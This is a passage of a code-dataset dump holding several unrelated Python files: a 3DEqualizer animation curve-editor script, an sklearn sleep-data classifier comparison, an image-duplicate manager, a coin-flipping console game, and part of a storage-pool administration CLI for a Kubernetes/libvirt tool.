Key\",75,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"key+\",\"key-\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"key+\",605,0,5,0)\r\n\r\n\t\t\t\t#add view all button...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"view_all\",\"View All\",70,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"view_all\",\"key+\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"view_all\",695,0,5,0)\r\n\r\n\t\t\t\t#create emphty curve lists...\r\n\t\t\t\tpos_x_curves_list = []\r\n\t\t\t\tpos_y_curves_list = []\r\n\t\t\t\tpos_z_curves_list = []\r\n\t\t\t\trot_x_curves_list = []\r\n\t\t\t\trot_y_curves_list = []\r\n\t\t\t\trot_z_curves_list = []\r\n\t\t\t\tscale_curves_list = []\r\n\t\t\t\tvisibility_curves_list = []\r\n\t\t\t\talpha_curves_list = []\r\n\r\n\t\t\t\t#create position curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_x_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_y_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_z_curves_list.append(curve_id)\r\n\t\t\t\t#create rotation curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_x_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_y_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_z_curves_list.append(curve_id)\r\n\t\t\t\t#create scale curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tscale_curves_list.append(curve_id)\r\n\t\t\t\t#create visibility curves...\r\n\t\t\t\tfor i in 
range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tvisibility_curves_list.append(curve_id)\t\r\n\t\t\t\t#create alpha curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\talpha_curves_list.append(curve_id)\r\n\r\n\t\t\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",pos_x_curves_list[0],1.0,0.4,0.4,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetXOffset(anim_req,\"curves_area\",frame_offset-1)\r\n\r\n\t\t\t\t#deselect 3DModels after requester opened...\r\n\t\t\t\tfor model in mlist:\r\n\t\t\t\t\ttde4.set3DModelSelectionFlag(pg,model,0)\r\n\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"view_all\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"view_all_menu_widget\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"curves_area\",\"Curvearea_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"key-\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"key+\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"jump_previous_key\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"jump_next_key\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"delete_keys_btn\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"menu_bar\",\"Editmenu_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"minus\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"plus\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"model_list\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"curves_list\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"create_update_anim_curves_btn\",\"Anim_Main_Callback\")\r\n\r\n\r\n\r\n\t\t\ttde4.postCustomRequesterAndContinue(anim_req,window_title,1200,800,\"Realtime_Update\")\r\n\t\t\ttde4.updateGUI()\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, all selected 3DModel(s) should not contain SurveyData.\",\"Ok\")\r\n\telse:\r\n\t\ttde4.postQuestionRequester(window_title,\"Error, at least one 3DModel must be selected.\",\"Ok\")\r\nelse:\r\n\ttde4.postQuestionRequester(window_title,\"Error, only 'CAMERA PGroup' 3DModels can be animated.\",\"Ok\")\n","sub_path":"r6_r7/old/3DModel_Animation_CurveEditor_v1.0b3.py","file_name":"3DModel_Animation_CurveEditor_v1.0b3.py","file_ext":"py","file_size_in_byte":30675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166281364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 26 16:38:18 2018\n\n@author: aoanng\n\"\"\"\n\nimport csv\nfrom random import seed\nfrom random import randrange\nimport numpy as np\nimport xlrd\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.datasets import make_blobs\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR # the SVM regression algorithm\nfrom sklearn.svm import SVC\nfrom sklearn import metrics # model evaluation package\nimport matplotlib.pyplot as plt\n\n\n\ndef 
loadData(filename):  # load the data, storing it row by row in a list\n    data_workbook = xlrd.open_workbook(filename)\n    data_sheet_names = data_workbook.sheet_names()\n    all_data = list()\n    for sht_name in data_sheet_names:\n        sheet = data_workbook.sheet_by_name(sht_name)\n        for idx in range(1, sheet.nrows):\n            dat = sheet.row_values(idx)  # get the contents of row idx\n            all_data.append(np.array(dat[:5]))\n\n    cls_np = np.stack(all_data, axis=0)\n\n    X = cls_np[:, 1:5].astype(float)\n\n    Y = (cls_np[:, 0]-2).astype(int)\n\n    return X, Y\n\n\nif __name__ == '__main__':\n    seed(1)\n    X, Y = loadData('sleepdata.xlsx')\n    data_X = preprocessing.StandardScaler().fit_transform(X)\n\n    random_seed = 1997 #2020, 0, 1997\n\n    X_train, X_test, y_train, y_test = train_test_split(data_X, Y, test_size=0.9, random_state=random_seed, shuffle=True)\n\n    svm = SVC(kernel='rbf', C=30, gamma=0.75, probability=True, max_iter=1000).fit(X_train, y_train)\n\n    tr_p = svm.predict(X_test)\n    print(\"SVC :\")\n    print(metrics.r2_score(y_test, tr_p))\n    print(metrics.mean_squared_error(y_test, tr_p))\n\n\n    # ## Decision tree\n    clf1 = DecisionTreeClassifier(max_depth=None, min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n    tr_p = clf1.predict(X_test)\n    print(\"DecisionTree :\")\n    print(metrics.r2_score(y_test, tr_p))\n    print(metrics.mean_squared_error(y_test, tr_p))\n\n\n    ## Random forest\n    clf2 = RandomForestClassifier(n_estimators=100, max_depth=None,\n                                  min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n    tr_p = clf2.predict(X_test)\n    print(\"RandomForest:\")\n    print(metrics.r2_score(y_test, tr_p))\n    print(metrics.mean_squared_error(y_test, tr_p))\n\n\n    ## ExtraTrees classifier ensemble\n    clf3 = ExtraTreesClassifier(n_estimators=100, max_depth=None,\n                                min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n    tr_p = clf3.predict(X_test)\n    print(\"ExtraTrees classifiers:\")\n    print(metrics.r2_score(y_test, tr_p))\n    print(metrics.mean_squared_error(y_test, tr_p))\n","sub_path":"SleepClasser2/ML-model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"377071891","text":"'''\nCreated on Aug 26, 2019\n\n@author: latikamehra\n'''\n\nfrom manageDuplicates import CleanupDuplicates\nimport time\n\nclass Manage():\n    \n    def __init__(self, obj):\n        self.RvwdBckp = obj.RvwdBckp\n        \n        self.imgDir, self.toKeepDir, self.secDupesDir = obj.imgDir, obj.toKeepDir, obj.secDupesDir\n        \n        self.pp = obj.pp\n        self.sep1 = obj.sep1\n        \n        self.op_summary = obj.op_summary\n        \n        self.getDupeCount = obj.getDupeCount\n        \n        self.deletedCount = 0\n        \n    \n    def manage(self, manualReview): \n        self.reviewedDupeDict = self.RvwdBckp.readDict()\n        \n        if len(self.reviewedDupeDict) >= 1 :\n            \n            clnp = CleanupDuplicates.Cleanup(self.imgDir, self.toKeepDir, self.secDupesDir)\n            \n            clnp.moveDuplicates(self.reviewedDupeDict, not manualReview)\n            \n            time.sleep(5)\n            \n            clnp.moveDupesToKeepToOriginalDir(not manualReview)\n            \n            time.sleep(5)\n            \n            self.deletedCount = clnp.removeDuplicates(not manualReview)\n            \n        else :\n            print(\"No reviewed duplicate files found in the directory.\\nSkipping\")\n            #quit()\n        \n        self.printSummaryInfo() \n        \n    def printSummaryInfo(self):\n        prntStr = \"\"\n        \n        prntStr += \"\\n\\n\"\n        prntStr += self.pp.cat([self.sep1])\n        prntStr += self.pp.cat([\"Number of duplicates removed = \"+str(self.deletedCount)])\n        prntStr += self.pp.cat([self.sep1])\n        \n        self.op_summary.info(prntStr)\n        \n    
","sub_path":"ImageDeduplicator_PixelAnalysis/execs/ManageDuplicates.py","file_name":"ManageDuplicates.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418690820","text":"\n################################\n################################\n## Author : Erik Marquez\n## Due : 9.1.2018\n## Class : comp sci 101 -002 TuTh 5:30-6:45\n## program number:2. Greedy Coins\n##\n## Two player coin game, played by flipping 3 coins\n## first player to reach 20 wins\n##\n## Step 1. Prompt user to enter name\n## Step 2. Play greedy coins by flipping three coins. \n## Step 3. ask player if he wants to play again\n################################\n\n\nimport random\ndef user_action():\n \"\"\"User decides to flip or hold\"\"\"\n choice = True\n while choice == True:\n user = input(' (F)lip Again or (H)old?').lower()\n if user == 'f':\n choice = False\n elif user == 'h':\n choice = False\n else:\n choice = True\n return user\n\n###\n### Calling all the veriables\n###\n\ncoin1 = ()\ncoin2 = ()\ncoin3 = ()\n\nplayer_score = 0\nai_score = 0\npot = 0\nai_pot = 0\n\nplayer_win = True\nai_win = False\n\n\nuser = ('f')\n\nplay = 'Y'\n\n##\n## Intro to game\n##\n\nprint('WELCOME TO GREEDY DICE!!\\n')\n\nuser_name = input('What is your name\\n')\n\n\n##\n##Game Loop \n##\n\nwhile play != 'no'and play != 'n':\n\n\n print('SCORE %s : 0 AI : 0 \\n' % user_name)\n\n## \n##Round loop\n##\n \n while ai_score <= 20:\n\n if player_score >= 20:\n break\n \n user = ('f')\n\n if player_win == True:\n play = input('Your turn. Hit enter to continue.\\n')\n\n ###\n ###User Loop Check to see if you need user of player_win\n ###\n while user == 'f':\n\n if player_score >= 20: \n break\n \n if ai_score >= 20:\n break\n\n if player_win == False:\n break\n\n play=()\n user=()\n \n ## Coins User\n \n coin_one = random.randint(0,1)\n coin_two = random.randint(0,1)\n coin_three = random.randint(0,1)\n coins = coin_one + coin_two + coin_three\n pot += coin_one + coin_two + coin_three\n \n if coin_one == 1:\n coin1 = 'H'\n else:\n coin1 = 'T'\n if coin_two == 1:\n coin2 = 'H' \n else:\n coin2 = 'T'\n if coin_three == 1:\n coin3 = 'H'\n else:\n coin3 = 'T'\n##\n##Conditional statments on the round, pot, or user winning\n##\n if coins == 0:\n user = 'f'\n pot = 0\n print('\\ncoins : ',coin1,coin2,coin3,'Pot : ',pot, end = ' ')\n print('BUST \\n \\n')\n break\n\n print('Coins : ',coin1,coin2,coin3,'Pot : ',pot,end=' ')\n\n if pot >= 20:\n player_score += pot\n break\n\n user = user_action()\n \n if user == 'h':\n player_score += pot\n pot = 0\n user = 'f'\n print('\\n \\nSCORE %s : %d AI : %d \\n' % (user_name, player_score, ai_score))\n\n \n if player_score < 20:\n play = input('It’s the computers turn. 
Hit enter to continue.\\n')\n\n\n \n ###\n ### ai_loop\n ###\n while ai_pot < 8: \n\n if player_score >= 20: \n break\n \n if ai_score >= 20:\n break\n if ai_pot >= 10:\n break\n\n \n player_win = True\n \n \n coin_one = random.randint(0,1)\n coin_two = random.randint(0,1)\n coin_three = random.randint(0,1)\n ai_coins = coin_one + coin_two + coin_three\n ai_pot += coin_one + coin_two + coin_three\n\n if coin_one == 1:\n coin1 = 'H'\n else:\n coin1 = 'T'\n if coin_two == 1:\n coin2 = 'H' \n else:\n coin2 = 'T'\n if coin_three == 1:\n coin3 = 'H'\n else:\n coin3 = 'T'\n##\n##Conditional statments for AI on the round, pot, or user winning\n##\n if ai_coins == 0:\n ai_pot = 0\n print('\\nAI coins : ',coin1,coin2,coin3,'Pot : ',ai_pot, end =' ')\n print('BUST')\n break\n\n print('Coins : ',coin1,coin2,coin3,'Pot : ',ai_pot,)\n\n ai_score += ai_pot\n\n ai_pot = 0\n\n if player_score <= 20: \n print('\\n \\nSCORE %s : %d AI : %d \\n' % (user_name, player_score, ai_score))\n\n\n ##\n ## Winners statments\n ##\n\n if player_score >=20:\n player_win = False\n ai_win = True\n print('%s you are the Winner!! \\n' % user_name)\n\n if ai_score >= 20:\n player_win = True\n ai_win = False\n print('Ai is the Winner\\n')\n\n##\n## Replay\n##\n \n player_score= 0\n ai_score= 0\n play = ()\n\n \n while play != 'n':\n if play == 'no':\n break\n if play == 'y':\n break\n if play == \"yes\":\n break\n \n play=input('Do you want to play Greedy Coin again? (YES/Y/NO/N)\\n')\n play=play.lower()\n\nprint('Thank You for playing!')\n\n","sub_path":"Greedy coins Finished .py","file_name":"Greedy coins Finished .py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"376175208","text":"import argparse\n\nfrom operation import *\n\nfrom utils import logger\nfrom utils.exception import ConditionException\n\nLOG = \"/var/log/kubesds3.log\"\n\nlogger = logger.set_logger(os.path.basename(__file__), LOG)\n\nSUPPORT_STORAGE_TYPE = [\"localfs\", \"nfs\", \"glusterfs\"]\n\n\n# os.putenv('LANG', 'en_US.UTF-8')\n\ndef execute(f_name, params):\n moudle = __import__('operation')\n func = getattr(moudle, f_name)\n try:\n check(f_name, params)\n func(params)\n except ExecuteException as e:\n logger.debug(f_name)\n logger.debug(params)\n logger.debug(traceback.format_exc())\n error_print(400, \"error occur while %s. %s\" % (f_name, e.message))\n except Exception:\n logger.debug(f_name)\n logger.debug(params)\n logger.debug(traceback.format_exc())\n error_print(300, \"error occur while %s. traceback: %s\" % (f_name, traceback.format_exc()))\n\n\ndef check(f_name, args):\n check_storage_type(args)\n check_pool(f_name, args)\n\n\ndef check_storage_type(args):\n if hasattr(args, 'type') and args.type not in SUPPORT_STORAGE_TYPE:\n error_print(100, \"unsupported value type: %s\" % args.type)\n\n\n# check pool type, if pool type not match, stop delete pool\ndef check_pool_type(args):\n try:\n if not hasattr(args, 'type'):\n return\n if not hasattr(args, 'pool'):\n return\n if args is None:\n return\n pool_info = get_pool_info_from_k8s(args.pool)\n if pool_info is None:\n error_print(202, \"check_pool_type, cannot get pool info from k8s.\")\n if pool_info['pooltype'] == args.type:\n return\n else:\n error_print(221, \"check_pool_type, pool type is not match. 
given is %s, actual is %s\" % (\n args.type, pool_info['pooltype']))\n except ExecuteException:\n logger.debug(traceback.format_exc())\n error_print(202, \"check_pool_type, cannot get pool info from k8s.\")\n\n\ndef check_pool(f_name, args):\n try:\n if f_name == 'cloneDisk':\n return\n if not hasattr(args, 'type'):\n return\n if not hasattr(args, 'pool'):\n return\n if f_name == 'createPool':\n if is_pool_exists(args.uuid):\n raise ConditionException(201, \"virsh pool %s has exist\" % args.uuid)\n else:\n if f_name == 'deletePool':\n # if pool is not create successful, delete it from k8s.\n helper = K8sHelper(\"VirtualMachinePool\")\n pool_info = helper.get_data(args.pool, \"pool\")\n if pool_info is None:\n helper.delete(args.pool)\n success_print(\"delete pool %s successful.\" % args.pool, {})\n\n check_pool_type(args)\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n if not is_pool_exists(pool):\n raise ConditionException(203, \"virsh pool %s not exist\" % pool)\n except ExecuteException as e1:\n logger.debug(traceback.format_exc())\n error_print(202, \"check_pool, cannot get pool info. %s\" % e1.message)\n except ConditionException as e2:\n logger.debug(traceback.format_exc())\n error_print(e2.code, e2.msg)\n\n\ndef is_virsh_disk_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n return True\n return False\n\n\ndef check_virsh_disk_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n error_print(207, \"virsh disk %s is in pool %s\" % (diskname, pool))\n\n\ndef check_virsh_disk_not_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if not os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n error_print(209, \"virsh disk %s is not in pool %s\" % (diskname, pool))\n\n\ndef check_virsh_disk_snapshot_exist(pool, diskname, snapshot):\n pool_info = get_pool_info(pool)\n if os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):\n error_print(209, \"virsh disk snapshot %s is in volume %s\" % (snapshot, diskname))\n\n\ndef check_virsh_disk_snapshot_not_exist(pool, diskname, snapshot):\n pool_info = get_pool_info(pool)\n if not os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):\n error_print(209, \"virsh disk snapshot %s is not in volume %s\" % (snapshot, diskname))\n\n\ndef check_virsh_disk_size(pool, vol, size):\n if get_volume_size(pool, vol) >= int(size):\n error_print(213, \"new disk size must larger than the old size.\")\n\n\ndef createPoolParser(args):\n if args.content is None:\n error_print(100, \"less arg, content must be set\")\n if args.content not in [\"vmd\", \"vmdi\", \"iso\"]:\n error_print(100, \"less arg, content just can be vmd, vmdi, iso\")\n\n execute('createPool', args)\n\n\ndef deletePoolParser(args):\n execute('deletePool', args)\n\n\ndef startPoolParser(args):\n execute('startPool', args)\n\n\ndef autoStartPoolParser(args):\n execute('autoStartPool', args)\n\n\ndef stopPoolParser(args):\n execute('stopPool', args)\n\n\ndef showPoolParser(args):\n execute('showPool', args)\n\n\ndef createDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n check_virsh_disk_exist(pool, args.vol)\n\n check_pool_active(pool_info)\n execute('createDisk', args)\n\n\ndef deleteDiskParser(args):\n try:\n helper = 
K8sHelper(\"VirtualMachineDisk\")\n disk_info = helper.get_data(args.vol, \"volume\")\n if disk_info is None:\n helper.delete(args.vol)\n success_print(\"delete disk %s successful.\" % args.vol, {})\n except ExecuteException as e:\n error_print(400, e.message)\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n check_virsh_disk_not_exist(pool, args.vol)\n execute('deleteDisk', args)\n\n\ndef resizeDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n check_virsh_disk_not_exist(pool, args.vol)\n check_virsh_disk_size(pool, args.vol, args.capacity)\n\n execute('resizeDisk', args)\n\n\ndef cloneDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n # pool = pool_info['poolname']\n try:\n disk_info = get_vol_info_from_k8s(args.newname)\n error_print(500, \"vol %s has exist in k8s.\" % args.newname)\n except ExecuteException:\n pass\n\n check_pool_active(pool_info)\n # check_virsh_disk_not_exist(pool, args.vol)\n # check_virsh_disk_exist(pool, args.newname)\n\n execute('cloneDisk', args)\n\n\ndef registerDiskToK8sParser(args):\n execute('registerDiskToK8s', args)\n\n\ndef rebaseDiskSnapshotParser(args):\n execute('rebaseDiskSnapshot', args)\n\n\ndef showDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n pool = pool_info['poolname']\n check_virsh_disk_not_exist(pool, args.vol)\n\n execute('showDisk', args)\n\n\ndef prepareDiskParser(args):\n execute('prepareDisk', args)\n\n\ndef releaseDiskParser(args):\n execute('releaseDisk', args)\n\n\ndef showDiskSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n execute('showDiskSnapshot', args)\n\n\ndef createExternalSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n check_virsh_disk_snapshot_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n config_path = '%s/config.json' % disk_dir\n with open(config_path, \"r\") as f:\n config = load(f)\n if not os.path.isfile(config['current']):\n error_print(100, \"can not find vol current %s.\" % config['current'])\n if os.path.isfile('%s/snapshots/%s' % (disk_dir, args.name)):\n error_print(100, \"snapshot file has exist\")\n\n execute('createExternalSnapshot', args)\n\n\ndef revertExternalSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n config_path = '%s/config.json' % disk_dir\n with open(config_path, \"r\") as f:\n config = load(f)\n\n if not os.path.isfile(config['current']):\n error_print(100, \"can not find current file\")\n execute('revertExternalSnapshot', args)\n\n\ndef deleteExternalSnapshotParser(args):\n try:\n helper = K8sHelper(\"VirtualMachineDiskSnapshot\")\n ss_info = helper.get_data(args.name, \"volume\")\n if ss_info is None:\n helper.delete(args.name)\n success_print(\"delete snapshot %s successful.\" % args.name, {})\n except ExecuteException as e:\n 
error_print(400, e.message)\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n ss_path = '%s/snapshots/%s' % (disk_dir, args.name)\n if not os.path.isfile(ss_path):\n error_print(100, \"snapshot file not exist\")\n\n execute('deleteExternalSnapshot', args)\n\n\ndef updateDiskCurrentParser(args):\n for current in args.current:\n if not os.path.isfile(current):\n error_print(100, \"disk current path %s not exists!\" % current)\n\n execute('updateDiskCurrent', args)\n\n\ndef customizeParser(args):\n execute('customize', args)\n\n\ndef createDiskFromImageParser(args):\n pool_info = get_pool_info_from_k8s(args.targetPool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n\n execute('createDiskFromImage', args)\n\n\ndef migrateParser(args):\n if not re.match('^((2(5[0-5]|[0-4]\\d))|[0-1]?\\d{1,2})(\\.((2(5[0-5]|[0-4]\\d))|[0-1]?\\d{1,2})){3}$', args.ip):\n error_print(100, \"ip is not right\")\n execute('migrate', args)\n\n\ndef migrateDiskParser(args):\n execute('migrateDisk', args)\n\n\ndef migrateVMDiskParser(args):\n execute('migrateVMDisk', args)\n\n\ndef changeDiskPoolParser(args):\n execute('changeDiskPool', args)\n\n\ndef modifyVMParser(args):\n execute('modifyVM', args)\n\n\ndef exportVMParser(args):\n try:\n execute('exportVM', args)\n vm_heler = K8sHelper('VirtualMachine')\n vm_heler.delete_lifecycle(args.domain)\n except Exception as e:\n raise e\n\n\ndef backupVMParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n try:\n execute('backupVM', args)\n vm_heler = K8sHelper('VirtualMachine')\n vm_heler.delete_lifecycle(args.domain)\n except Exception as e:\n raise e\n\n\ndef restoreVMParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n if args.target:\n pool_info = get_pool_info_from_k8s(args.target)\n check_pool_active(pool_info)\n execute('restoreVM', args)\n\n\ndef backupDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n execute('backupDisk', args)\n\n\ndef restoreDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n if args.target:\n pool_info = get_pool_info_from_k8s(args.target)\n check_pool_active(pool_info)\n execute('restoreDisk', args)\n\n\ndef showDiskPoolParser(args):\n execute('showDiskPool', args)\n\n\ndef deleteVMBackupParser(args):\n execute('deleteVMBackup', args)\n\n\ndef deleteVMDiskBackupParser(args):\n execute('deleteVMDiskBackup', args)\n\n\ndef deleteRemoteBackupParser(args):\n execute('deleteRemoteBackup', args)\n\n\ndef pullRemoteBackupParser(args):\n execute('pullRemoteBackup', args)\n\n\ndef pushBackupParser(args):\n # if args.vol:\n # execute('pushVMDiskBackup', args)\n # else:\n # execute('pushVMBackup', args)\n execute('pushVMBackup', args)\n\n\ndef createCloudInitUserDataImageParser(args):\n execute('createCloudInitUserDataImage', args)\n\n\ndef deleteCloudInitUserDataImageParser(args):\n execute('deleteCloudInitUserDataImage', args)\n\n\ndef updateOSParser(args):\n execute('updateOS', args)\n\n\ndef cleanBackupParser(args):\n execute('cleanBackup', args)\n\n\ndef cleanRemoteBackupParser(args):\n execute('cleanRemoteBackup', args)\n\n\ndef scanBackupParser(args):\n execute('scanBackup', args)\n\n\ndef deleteRemoteBackupServerParser(args):\n 
execute('deleteRemoteBackupServer', args)\n\n\n# --------------------------- cmd line parser ---------------------------------------\nparser = argparse.ArgumentParser(prog=\"kubesds-adm\", description=\"All storage adaptation tools\")\n\nsubparsers = parser.add_subparsers(help=\"sub-command help\")\n\n# -------------------- add createPool cmd ----------------------------------\nparser_create_pool = subparsers.add_parser(\"createPool\", help=\"createPool help\")\nparser_create_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_create_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n\n# localfs, nfs and glusterfs only, target will transfer to path in nfs and glusterfs\nparser_create_pool.add_argument(\"--url\", required=True, metavar=\"[URL]\", type=str,\n help=\"storage pool create location\")\n\n# set autostart\nparser_create_pool.add_argument(\"--autostart\", metavar=\"[AUTOSTART]\", type=bool, nargs='?', const=True,\n help=\"if autostart, pool will set autostart yes after create pool\")\n\n# set content\nparser_create_pool.add_argument(\"--content\", metavar=\"[CONTENT]\", type=str,\n help=\"pool content\")\n\n# nfs only\nparser_create_pool.add_argument(\"--opt\", metavar=\"[OPT]\", type=str,\n help=\"nfs require or nfs mount options\")\n\n# nfs and glusterfs only\nparser_create_pool.add_argument(\"--uuid\", metavar=\"[UUID]\", type=str,\n help=\"nfs or glusterfs poolname \")\n\n# set default func\nparser_create_pool.set_defaults(func=createPoolParser)\n\n# -------------------- add deletePool cmd ----------------------------------\nparser_delete_pool = subparsers.add_parser(\"deletePool\", help=\"deletePool help\")\nparser_delete_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_delete_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n# set default func\nparser_delete_pool.set_defaults(func=deletePoolParser)\n\n# -------------------- add startPool cmd ----------------------------------\nparser_start_pool = subparsers.add_parser(\"startPool\", help=\"startPool help\")\nparser_start_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_start_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n# set default func\nparser_start_pool.set_defaults(func=startPoolParser)\n\n# -------------------- add autoStartPool cmd ----------------------------------\nparser_autostart_pool = subparsers.add_parser(\"autoStartPool\", help=\"autoStartPool help\")\nparser_autostart_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_autostart_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to autostart\")\nparser_autostart_pool.add_argument(\"--disable\", metavar=\"[DISABLE]\", type=bool, nargs='?', const=True,\n help=\"disable autostart\")\n\n# set default func\nparser_autostart_pool.set_defaults(func=autoStartPoolParser)\n\n# -------------------- add stopPool cmd ----------------------------------\nparser_stop_pool = subparsers.add_parser(\"stopPool\", help=\"stopPool 